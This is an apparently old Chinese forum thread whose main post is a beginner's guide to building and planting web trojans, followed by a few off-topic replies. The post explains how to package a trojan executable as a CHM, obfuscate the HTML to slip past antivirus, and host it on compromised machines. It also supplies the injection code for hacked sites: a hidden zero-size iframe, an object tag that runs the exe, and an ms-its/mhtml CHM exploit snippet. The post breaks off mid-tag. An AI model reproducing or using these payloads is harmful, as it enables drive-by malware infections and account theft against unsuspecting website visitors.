[推荐]网页木马制作小结
<p>这是以前写的文章了..也是个很老的方法了...<br/>当然做网页木马的方法并不止这几个...网上也有相应的教程和工具....没什么新意...只是给新手看的...老手现在可以直接跳过看别的文章了<br/>希望台下的兄弟看了后表砸我....</p><p><br/>其实做网页木马的方法还是很多滴~~网上也有相关教程。<br/>最简单的也就是用ChmBuilder这个软件来制作chm木马了,首先我们要配置好一个木马服务端,我再这里就拿QQ杀手7.1版说下把。关于他的使用和配置我就不多说了把,下载了这软件都自带有帮助文件的,看几遍就会明白的了。然后生成服务端,假设我生成的木马服务端为mm.exe,接着打开ChmBuilder选择我们的mm<br/>.exe然后点生成,就会在相同目录下自动生成一个mm.chm和mm.htm (注意:这几个文件可不要轻易去点哦,万一出了什么后果,不要找偶~~~……^_^) 接着就把mm.chm和mm.htm传到自己的空间,如果没空间有肉鸡也是可以滴,建议最好用肉鸡,这样万一对方发现了也是你发现你肉鸡。但是有的空间还是比较严格的,在上传时会发现那个mm.htm并不存在,那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了htmtool<br/>网页加密程序,选择源文件为mm.htm目标文件m.htm然后点加密,程序就会在mm.htm目录下生成一个用Javascript加密后的m.htm,然后把m.htm传肉鸡或空间里去把。 我在本机测试。_blank>http://127.0.0.1/m.htm就是我们的网页木马地址了,只要把这个发给别人,对方浏览了就会中了我们的木马。 但是对方会相信你吗?现在的网民安全意识也稍微提高了点,对于你发来的站都不会轻易去点。 所以呢~~还是自己动手把。入侵~~~~挂马!嘿嘿~~对不起那些站长了。 相信大家也都知道这个名词把.....不知道的就....别找我哦。</p><p>一般在你入侵了一个站拿到了webshell的时候,有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 :<br/><html><br/><iframe src="<a href="http://127.0.0.1/m.htm" target="_blank"><font color="#000000">http://127.0.0.1/m.htm</font></a>" width="0" height="0" frameborder="0"></iframe><br/></html></p><p>把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://127.0.0.1/m.htm。而_blank>http://127.0.0.1/m.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?懂点英文的朋友也应该知道了把,width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。</p><p>不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索iframe就能找到了我们的木马了,一个del,哈哈~~~~玩完了。</p><p><br/>所以,下面再介绍几个把。</p><p>单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件,代码如下<br/><object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="mm.exe"<br/> </object><br/>当然你也可以把mm.exe和mm.htm换成是别的文件名。然后用QuickCHM这个软件来编译成为chm文件。(这些工具在google都能搜索到的)然后chm向导。选中*.*,项目文件夹就是刚才那两个mm.exe和mm.htm所在的目录了。<br/>然后下一步,htm文件在上,exe文件在下,接着可以编译他了。<br/>编辑成功后千万不要点“是”给运行了。那样自己就中了马了~~然后就会发现原来的2个文件已经多出了四个<br/>newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个newproject.chm ,然后把他改任意名上传空间。</p><p>但这个挂马就不能用上面的那段代码了。假设我做好的chm木马为_blank>http://127.0.0.1/mm.chm</p><p>那就用以下代码</p><p><textarea id="code" style="display:none;"><br/><object data="ms-its:mhtml:file://c:\foo.mht!_blank>http://127.0.0.1/mm.chm::/test.htm" type="text/x-scriptlet"></object><br/></textarea><br/><script language="javascript"><br/>document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('index.asp'))));<br/></script></p><p>请把路径换成你的chm木马地址,index.aso要换成对应的主页文件名,假如你要挂马的主页名是default.asp<br/>那相应的index.asp也就要换成default.asp了。</p><p>但是好景不长啊,再好的东西也有坏的时候,就在一次挂马中 在主页里添加了以上代码后,发现主页自动被删,FT~~~真是极度郁闷!后来经过我反思,又想到了一个方法,也提供给大家,就是找一个能上传的肉鸡,然后新建一个文件,假设为ceshi.htm 然后这个文件什么都不要加<br/>在代码里写入<br/><textarea id="code" style="display:none;"><br/><object data="ms-its <p>你发得不烦.?>!~</p><p>我看得都烦了?!~</p><p>不会来点新鲜的?!~..</p><p>就只会发你喜欢的什么黑客知识?!~</p> 那就来点温柔的 ... <div class="quote"><b>以下是引用<i>惠安迪哥</i>在2006-5-5 13:03:00的发言:</b><br/>那就来点温柔的</div><p></p><p>恶?!~</p><p>不用了</p><p>那你继续发你的知识...</p><p>我不看就是了?!`</p> 呵呵 <p>干吗?!~</p><p>一个大男人的..</p><p>动不动就哭?!~</p><p>晕死?!~</p>
页:
[1]